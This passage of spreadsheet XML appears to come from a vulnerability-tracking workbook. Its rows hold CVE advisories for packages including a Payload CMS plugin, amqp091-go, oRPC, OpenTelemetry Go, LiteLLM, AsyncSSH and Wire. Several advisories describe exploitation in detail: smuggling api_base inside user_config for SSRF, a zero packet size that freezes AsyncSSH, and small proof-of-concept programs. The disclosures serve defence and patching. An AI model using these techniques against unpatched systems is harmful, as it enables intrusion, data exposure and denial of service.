      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Payload Plugins is a collection of plugins designed to enhance Payload CMS. In 0.7.0, @jhb.software/payload-alt-text-plugin exposes POST /api/alt-text-plugin/generate and POST /api/alt-text-plugin/bulk with a default guard that accepts any authenticated user, while alt-text/src/endpoints/generateAltText.ts and alt-text/src/endpoints/bulkGenerateAltTexts.ts call req.payload.findByID and req.payload.update without overrideAccess: false. Payload therefore defaults overrideAccess to true and skips the target collection's read and update access functions. An authenticated low-privilege user can supply id, collection, locale, and update values to read arbitrary protected upload documents and overwrite their alt and keywords fields, even when the collection permits those operations only to administrators. A control Local API call with overrideAccess: false is denied, confirming that the plugin endpoint bypasses otherwise effective collection rules. This vulnerability is fixed in 0.8.0.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59965</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77407</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M13" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr"/>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-316</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>## Summary
An information disclosure vulnerability exists in the AMQP client implementation's authentication handling configuration. Following a successful connection handshake, the `Connection.Config.SASL` field stores the `Authentication` implementation state used to establish the session. 
For standard `PLAIN` authentication, this state utilizes the `PlainAuth` struct, which defines both `Username` and `Password` as publicly exported, plaintext string fields. Because this sensitive data is retained permanently in-memory within an exported field structure, any peripheral code, internal package, reflective logger, dependency, or automated debugging utility with access to the core `*Connection` object can read and expose the raw credentials.
---
## Vulnerability Details
### Mechanism
The vulnerability stems from the structural design of the configuration storage used during and after the AMQP handshake:
```go
// auth.go:21-23
type PlainAuth struct {
    Username string
    Password string  // exported plaintext
}
```
When an application initializes a connection, the `PlainAuth` object is deeply nested inside the configuration structure (`Connection.Config`). Even after the handshake concludes and authentication is complete, this structure persists natively in-memory for the duration of the network connection's lifecycle. 
Because `Password` is an exported string field, standard automated inspection mechanisms can read its value without restriction.
### Affected Code Paths &amp; Integrations
Any sub-component or library that traverses or reads the `*Connection` object will inadvertently read the plaintext password, including:
* **Reflective Loggers:** Structured logging frameworks that serialize nested configuration structs into JSON/Log formats.
* **APM &amp; Performance Agents:** Automated telemetry or Application Performance Monitoring tools that capture state snapshots.
* **Debugging &amp; Panic Handlers:** Mid-tier software or dump libraries designed to capture goroutine state or print deep struct hierarchies upon program errors or signals.
### Impact
The credential remains vulnerable to leak paths into logging pipelines, log aggregators, security information and event management (SIEM) systems, or standard output. Once transmitted to external log infrastructure, these credentials become accessible to unprivileged operators or any actor with access to log archives.
---
## Attack Vector
An attacker does not necessarily need direct remote code execution to exploit this flaw; instead, the vulnerability acts as a credential harvesting vector inside multi-tenant environments or via secondary log exposure:
1. **Configuration Dump:** An operator configures a standard reflective logger or third-party APM package to capture system state parameters, including the active AMQP `*Connection` object.
2. **Reflective Access:** The inspection engine uses Go's `reflect` package to walk the structural hierarchy, pulling the string value from `Connection.Config.SASL.(*PlainAuth).Password`.
3. **Exfiltration:** The plaintext password is written to standard system logs, which are then scraped into shared logging aggregators, exposing production infrastructure credentials to a wider audience.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77407</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77360</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>npm:@orpc/server</t>
        </is>
      </c>
      <c r="M14" s="5" t="inlineStr">
        <is>
          <t>1.14.8</t>
        </is>
      </c>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr"/>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-113</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>### Summary
A flaw in the CORS plugin allowed the incoming request's `Vary` header to be reflected into the response, letting a client influence a header that should be controlled solely by the server.
### Details
The CORS plugin previously copied the request's `Vary` header directly onto the response instead of treating `Vary` as a response-only header. Because `Vary` tells downstream caches and proxies how to key their cached responses, this allowed a client to inject arbitrary values into the response's `Vary` header, potentially distorting cache-key behavior in shared caches/CDNs sitting in front of an oRPC server and leading to inconsistent CORS enforcement for other clients.
Practical impact is limited to deployments where a shared cache or reverse proxy keys on the `Vary` header; the real-world effect depends on the caching layer's configuration.
### Impact
May cause cache key pollution and inconsistent CORS enforcement in setups that rely on shared/edge caches keying on `Vary`. No direct confidentiality, integrity, or availability impact in default (non-cached) configurations.
### Resolution
Update `@orpc/server` (and any other `@orpc/*` packages bundling the CORS plugin) to `1.14.8`. The CORS plugin now derives `Vary` exclusively from the response, appending `Origin` and preserving existing values instead of reflecting request headers.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77360</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81871</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>go:go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc</t>
        </is>
      </c>
      <c r="M15" s="5" t="inlineStr">
        <is>
          <t>0.21.0</t>
        </is>
      </c>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr"/>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-923</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>### Summary
The OTLP log gRPC exporter loads TLS settings from environment variables but does not apply them when creating gRPC transport credentials. Operators who rely on `OTEL_EXPORTER_OTLP_LOGS_CERTIFICATE`, `OTEL_EXPORTER_OTLP_CERTIFICATE`, or related client certificate variables for CA pinning or mTLS get a connection that falls back to system roots and omits the env-supplied client certificate. A network attacker who can intercept or spoof the collector connection with a system-trusted certificate can read or alter log telemetry. 
Introduced in commit: d99c76f
### Details
The affected code is in `exporters/otlp/otlplog/otlploggrpc`.
`newConfig` resolves env-based TLS configuration into `cfg.tlsCfg` at `exporters/otlp/otlplog/otlploggrpc/config.go:106-116`. The finding also identifies `loadEnvTLS` at `config.go:451-492` as the code that builds a `*tls.Config` containing `RootCAs` and client certificates from `OTEL_EXPORTER_OTLP[_LOGS]_CERTIFICATE` and `OTEL_EXPORTER_OTLP[_LOGS]_CLIENT_CERTIFICATE`/`KEY`.
However, `newGRPCDialOptions` in `exporters/otlp/otlplog/otlploggrpc/client.go:83-92` only checks `cfg.gRPCCredentials` and `cfg.insecure`. When neither is set, which is the normal env-only TLS configuration path, it uses `credentials.NewTLS(nil)`. That default trusts the host system root CAs and contains no env-supplied client certificate. The finding evidence reports no other `tlsCfg` use in the package, so env-based CA pinning and mTLS settings are loaded but not enforced.
### PoC
[validation-artifact.zip](https://github.com/user-attachments/files/27493589/validation-artifact.zip)
The validation artifact contains a ready-to-run test at `validation-artifact.zip:./poc_env_tls_ignored_test.go` and brief instructions at `validation-artifact.zip:./README.md`.
From a checkout of `pellared/opentelemetry-go` at commit `d99c76f`, with Go module dependencies available:
```sh
FINDING_DIR=/path/to/02-e6e2897a969c8191b260f243fbc99ebd-log-grpc-exporter-ignores-env-tls-certs-bypassing-mtls-pinning
cd /path/to/opentelemetry-go
git checkout d99c76f
tar -xOf validation-artifact.tar ./poc_env_tls_ignored_test.go &gt; exporters/otlp/otlplog/otlploggrpc/poc_env_tls_ignored_test.go
cd exporters/otlp/otlplog/otlploggrpc
GO111MODULE=on go test -v -run TestEnvTLSIgnored -count=1
```
The test generates a private CA and a TLS gRPC logs server certificate signed by that CA. It sets:
```sh
OTEL_EXPORTER_OTLP_LOGS_ENDPOINT=https://127.0.0.1:&lt;test-port&gt;
OTEL_EXPORTER_OTLP_LOGS_CERTIFICATE=&lt;temp-dir&gt;/ca.pem
```
Expected output includes an `unknown authority` failure for the first export call even though the env certificate points to the server CA, followed by a passing test after the same `cfg.tlsCfg` is explicitly wired through `WithTLSCredentials`:
```text
=== RUN   TestEnvTLSIgnored
    poc_env_tls_ignored_test.go:...: export error (expected due to ignored tlsCfg): ... x509: certificate signed by unknown authority
--- PASS: TestEnvTLSIgnored
PASS
```
This demonstrates that the env CA is parsed into `cfg.tlsCfg` but ignored by the default gRPC dial path.
### Impact
This is improper TLS certificate validation and endpoint authentication caused by ignoring configured trust material. Users of the OTLP log gRPC exporter who configure TLS, CA pinning, or mTLS through environment variables are impacted when they do not also supply explicit `WithTLSCredentials`. TLS still occurs with system roots, but the intended private CA pinning and client certificate authentication are bypassed. An attacker with a suitable network position and a system-trusted certificate for the collector endpoint can intercept or tamper with log telemetry that operators expected to be protected by the configured CA or mTLS policy.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81871</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59823</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>pip:litellm</t>
        </is>
      </c>
      <c r="M16" s="5" t="inlineStr">
        <is>
          <t>1.83.9</t>
        </is>
      </c>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr"/>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>### Summary
A server-side request forgery in LiteLLM Proxy lets an authenticated caller redirect the
proxy's outbound request to a host of their choosing by smuggling an `api_base` inside the
`user_config` request body, bypassing the existing parameter guard.
### Details
LiteLLM Proxy validates request bodies with `is_request_body_safe`, which blocks the
`api_base` and `base_url` parameters but does not cover `user_config`. The `user_config`
object is used to build the outbound router for a request, so a caller can place an
`api_base` inside it and reach an arbitrary host. The guard only inspected the two
top-level keys, so the same `api_base` nested inside `user_config` was never checked.
Exploitation requires a valid virtual key.
### Impact
An authenticated caller can make the proxy issue server-side requests to internal or
external hosts of their choosing, reaching endpoints the caller cannot otherwise access.
### Affected / Patched
Affected: `&lt;= 1.83.8`
Patched: `1.83.9`
### Remediation
Upgrade to 1.83.9 or later (released 2026-04-17).</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59823</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81870</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>go:go.opentelemetry.io/otel/exporters/otlp/otlptrace, go:go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc, go:go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp, go:go.opentelemetry.io/otel/exporters/zipkin, go:go.opentelemetry.io/otel/sdk</t>
        </is>
      </c>
      <c r="M17" s="5" t="inlineStr">
        <is>
          <t>1.45.0</t>
        </is>
      </c>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr"/>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-532</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>### Summary
OpenTelemetry Go versions 1.5.0 through 1.44.0 can include trace exporter endpoint configuration in an internal diagnostic log emitted when an SDK `TracerProvider` is created. The default OpenTelemetry logger does not emit this event. Exposure requires an application to install a logger that enables OpenTelemetry's internal Info-level diagnostics and for someone other than the intended audience to have access to those logs.
The logged configuration can disclose the address of the trace collector and whether the OTLP/HTTP connection is configured as insecure. The Zipkin exporter logs its complete collector URL, so credentials in URL userinfo or tokens in the query string are also disclosed if an application embeds them there. OTLP authentication headers, TLS key material, and exported span data are not included in this log.
Exporter `MarshalLog` implementations that caused this configuration to be included in internal logs were introduced by [`a1fff3c`](https://github.com/open-telemetry/opentelemetry-go/commit/a1fff3c2588c783d1f3f6fd2315aa2660fc6d330).
### Details
When `sdk/trace.NewTracerProvider` constructs a provider, it records a `TracerProvider created` internal Info event containing the provider configuration. In affected versions, the configuration's `MarshalLog` methods recursively include:
1. the provider's span processors;
2. each processor's span exporter; and
3. for the OTLP trace exporter, its client configuration.
This causes the following values to be present in the event:
- OTLP trace gRPC: the configured endpoint;
- OTLP trace HTTP: the configured endpoint and the `Insecure` flag; and
- Zipkin: the complete collector URL.
OpenTelemetry Go does not emit this event with its default logger, which only emits errors. An application must explicitly configure a sufficiently verbose logger with `otel.SetLogger`. The required `logr` verbosity is version-dependent:
- versions 1.5.0 through 1.14.x use `V(1)` for this Info event; and
- versions 1.15.0 through 1.44.0 use `V(4)`.
OTLP header configuration is not part of the marshaled object, so credentials supplied with `WithHeaders` or the corresponding environment variables are not exposed. The documented OTLP `WithEndpoint` input is a collector address rather than a credential-bearing URL. The higher-risk case is therefore the Zipkin collector URL, which is retained and logged in full, or an application passing sensitive data in an OTLP endpoint outside the documented format.
### Proof of concept
The following program demonstrates the behavior with OpenTelemetry Go 1.44.0. It deliberately places credentials and a token in the Zipkin collector URL and enables internal Info logging:
```go
package main
import (
	"bytes"
	"context"
	"fmt"
	"github.com/go-logr/logr/funcr"
	"go.opentelemetry.io/otel"
	"go.opentelemetry.io/otel/exporters/zipkin"
	sdktrace "go.opentelemetry.io/otel/sdk/trace"
)
func main() {
	var logs bytes.Buffer
	otel.SetLogger(funcr.New(func(_, args string) {
		_, _ = logs.WriteString(args)
	}, funcr.Options{Verbosity: 4}))
	exporter, err := zipkin.New(
		"http://user:pass@zipkin.internal:9411/api/v2/spans?token=secret",
	)
	if err != nil {
		panic(err)
	}
	tp := sdktrace.NewTracerProvider(sdktrace.WithBatcher(exporter))
	_ = tp.Shutdown(context.Background())
	fmt.Println(logs.String())
}
```
The `TracerProvider created` event contains:
```text
http://user:pass@zipkin.internal:9411/api/v2/spans?token=secret
```
For versions before 1.15.0, set `funcr.Options{Verbosity: 1}` instead.
### Impact
This is a conditional disclosure through application logs. Affected applications must enable verbose OpenTelemetry internal diagnostics and configure a trace exporter containing information they do not intend to expose to readers of those logs. In that configuration, a person or system with log access can learn the trace collector address and internal network topology. If credentials or tokens are embedded directly in a Zipkin collector URL, those values can also be recovered from the logs.
There is no exposure with the default OpenTelemetry logger, and the vulnerable log is generated from local application configuration rather than remotely supplied span data. OTLP authentication headers, certificate or private-key contents, and telemetry payloads are not logged by this path.
### Remediation
Upgrade the affected OpenTelemetry Go modules to version 1.45.0 or later. The fix in [`3a1412d`](https://github.com/open-telemetry/opentelemetry-go/commit/3a1412d2b3bc4e4231fbeac2ed42117ae541bb38) stops recursively marshaling exporter and client configuration and records their types instead.
If an immediate upgrade is not possible:
- keep OpenTelemetry internal logging below the Info verbosity described above;
- do not embed credentials or tokens in exporter endpoint URLs; use authentication headers or another supported credential mechanism; and
- restrict access to existing logs and rotate any credentials that may already have been recorded.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81870</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62949</t>
        </is>
      </c>
      <c r="D18" s="5" t="inlineStr"/>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>pip:asyncssh</t>
        </is>
      </c>
      <c r="M18" s="5" t="inlineStr">
        <is>
          <t>2.24.0</t>
        </is>
      </c>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr"/>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>## Summary
A malicious SSH server can wedge an AsyncSSH **client**, and an authenticated
client can wedge an AsyncSSH **server**, by sending a channel `maximum packet
size` of `0` in `SSH_MSG_CHANNEL_OPEN_CONFIRMATION` (server→client) or
`SSH_MSG_CHANNEL_OPEN` (client→server). AsyncSSH stores the peer-supplied value
verbatim with no lower-bound check; the first time channel data is written,
`SSHChannel._flush_send_buf` enters a **synchronous infinite loop** that cannot
be interrupted by `asyncio.wait_for` or any timeout. The loop body has no
`await`, so it blocks the entire asyncio event loop — for a server, one
malicious authenticated channel freezes **all** current and future connections.
RFC 4254 §5.1 leaves receiver behavior for a peer-reported "maximum packet
size = 0" undefined, so the value must be rejected rather than stored.
## Root cause
`asyncssh/channel.py`:
```python
# process_open (server side)        -- line 465
self._send_pktsize = send_pktsize    # peer value, no &gt;= 1 check
# process_open_confirmation (client) -- line 528
self._send_pktsize = send_pktsize    # peer value, no &gt;= 1 check
# _flush_send_buf                    -- lines 305-320
while self._send_buf and self._send_window:
    pktsize = min(self._send_window, self._send_pktsize)  # 0 when peer sends 0
    buf, datatype = self._send_buf[0]
    if len(buf) &gt; pktsize:          # True for any buffered data
        data = buf[:pktsize]        # empty (b'')
        del buf[:pktsize]           # no-op
    ...
    self._send_window -= len(data)  # -= 0, unchanged
```
With `_send_pktsize == 0`, `pktsize` is `0`, so `buf[:0]` is empty,
`del buf[:0]` is a no-op, and `_send_window` is never decremented — the
`while` condition is permanently true, and with no `await` in the body the
event loop is blocked.
## Impact
- **Client vector (primary):** a malicious SSH server replies to the client's
  channel open with `maximum packet size = 0`; the client wedges on its first
  channel write. The attacker is the server, so it needs no valid credentials.
- **Server vector:** an authenticated client opens a channel with
  `maximum packet size = 0`; any server-side channel write wedges the AsyncSSH
  server's event loop, freezing **every** current and future connection. A
  single low-privilege account can take the whole server down.
Both vectors are a single SSH message, deterministic, and cause total
availability loss for the affected process.
## Affected versions
&lt;= 2.23.1 (latest release, 2026-06-06); also present on `master`
(channel.py:465/528 unguarded). Verified end-to-end on 2.23.1.
## Verification
The maintainer's proposed fix (reject `send_pktsize == 0` in `connection.py`
`_process_channel_open` / `_process_channel_open_confirmation`) was applied to
2.23.1 and re-tested end-to-end over TCP:
- **Unpatched:** malicious server (paramiko forcing `max_packet_size=0` in
  OPEN_CONFIRMATION) + real asyncssh client → client event loop wedges.
- **Patched:** the guard fires inside `_process_channel_open_confirmation`, the
  malicious value is rejected, the connection closes cleanly
  (`ChannelOpenError: SSH connection closed`), and the client does **not** wedge.
The maintainer (Ron Frederick) independently confirmed the freeze and noted that
**even shutting the server down does not break clients out of the loop**.
Reproducers available: a focused harness driving the real
`SSHChannel._flush_send_buf` with `_send_pktsize=0`, and an end-to-end
`malicious_server.py` (paramiko) + `client.py` (real asyncssh) pair. The
end-to-end client repro uses `asyncio.new_event_loop()` (not `get_event_loop()`)
for Python 3.14 compatibility.
## Suggested fix (maintainer's approach)
In `connection.py`, after each `send_pktsize = packet.get_uint32()` in
`_process_channel_open` and `_process_channel_open_confirmation`:
```python
if send_pktsize == 0:
    raise ProtocolError('Invalid maximum packet size')
```
## CVSS
`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` (6.5 Medium). An earlier draft
quoted 7.5 High ("100% CPU"); the synchronous loop burns ~100% of one core's
worth of CPU but, being single-threaded, the OS scheduler spreads it across
cores, so the real impact is event-loop / connection freeze, not machine-wide
CPU exhaustion.
## References
- RFC 4254 §5.1 (channel "maximum packet size"; behavior for 0 is undefined).
- The same `maximum packet size = 0` send-loop wedge was confirmed in several
  other independent SSH implementations (different languages/runtimes) and
  reported to each maintainer separately.
## Credits
Reported by zhangph (afldl), 2026-06-20.
```</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62949</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63126</t>
        </is>
      </c>
      <c r="D19" s="5" t="inlineStr"/>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>maven:com.squareup.wire:wire-runtime</t>
        </is>
      </c>
      <c r="M19" s="5" t="inlineStr">
        <is>
          <t>6.4.5, 7.0.0-alpha04</t>
        </is>
      </c>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr"/>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Wire's protobuf decoders did not consistently validate attacker-controlled length-delimited sizes against the current reader bounds before computing cursor, limit, or pointer positions.
In the Kotlin runtime, `ProtoAdapter.decode(ByteArray)` and `ProtoAdapter.decode(ByteString)` use the `ProtoReader32` fast path implemented by `ByteArrayProtoReader32`. In `ByteArrayProtoReader32.internalNextLengthDelimited()`, Wire read an untrusted varint length into an `Int` and rejected only negative values. A length such as `2147483647` is non-negative, so it passed that check, but `pos + length` overflowed the signed 32-bit cursor and produced a negative `limit`. The following `if (limit &gt; pushedLimit)` guard did not catch this because the overflowed value was negative.
That invalid limit then reached string, bytes, skip, and scalar-reading paths as an invalid byte count or invalid range. Instead of failing as a checked decode error such as `IOException`, malformed input could throw unchecked runtime exceptions including `IllegalArgumentException` and `ArrayIndexOutOfBoundsException`. Applications commonly treat malformed protobuf input as an expected decode failure; unchecked runtime exceptions escaping that boundary can crash request handling or the process.
The original report is a sibling of the negative-length skipped-group bug fixed as CVE-2026-45799. It is not the same bug. The length in this advisory is positive, and the overflow occurs when setting a length-delimited message limit, not only when skipping a group.
While auditing for the same bug class, related boundary flaws were also found and fixed:
- Kotlin `ProtoReader` now validates logical message limits before varint, fixed32, fixed64, and skip operations. The originally reported byte-array overflow payload did not reproduce as the same signed overflow in `ProtoReader`, because that reader tracks positions as `Long`, but the streaming reader still needed consistent current-message-limit enforcement.
- Swift `ReadBuffer.readVarint()` read `pointer.pointee` before checking that one byte remained. A tag-only varint field could read past the end of the buffer.
- Swift `ReadBuffer.verifyAdditional(count:)` formed `pointer.advanced(by: count)` before proving the requested `count` fit within the remaining buffer, so pointer arithmetic ran before the bounds were established. (The distinct Swift negative-length `skipGroup()` crash is tracked separately as GHSA-86wm-r4c5-2rc9 / CVE-2026-61695; this advisory covers the positive/oversized-length boundary failures.)
- Swift nested-message decoding and packed-repeated decoding computed end pointers from untrusted lengths before validating that the bytes were present.
- Swift packed-repeated decoding reserved array capacity from an untrusted length before validating that the length existed in the current buffer.
- Swift size-delimited decoding converted an untrusted `UInt64` varint size to `Int` without exactness or availability checks. On platforms where the value is not representable, this could trap.
The fix enforces a single invariant across the hardened readers: every decoded or skipped byte count must be non-negative and no larger than the remaining bytes in the current logical message limit before any cursor, pointer, limit, allocation, or slice is advanced.
### Impact
An attacker who can supply protobuf bytes to an application using affected Wire decoders can trigger a denial of service by causing decode to fail with unchecked runtime failures or traps rather than normal malformed-input decode errors.
Known impact:
- Availability impact only.
- No known confidentiality impact.
- No known integrity impact.
- No known code execution.
Attack requirements:
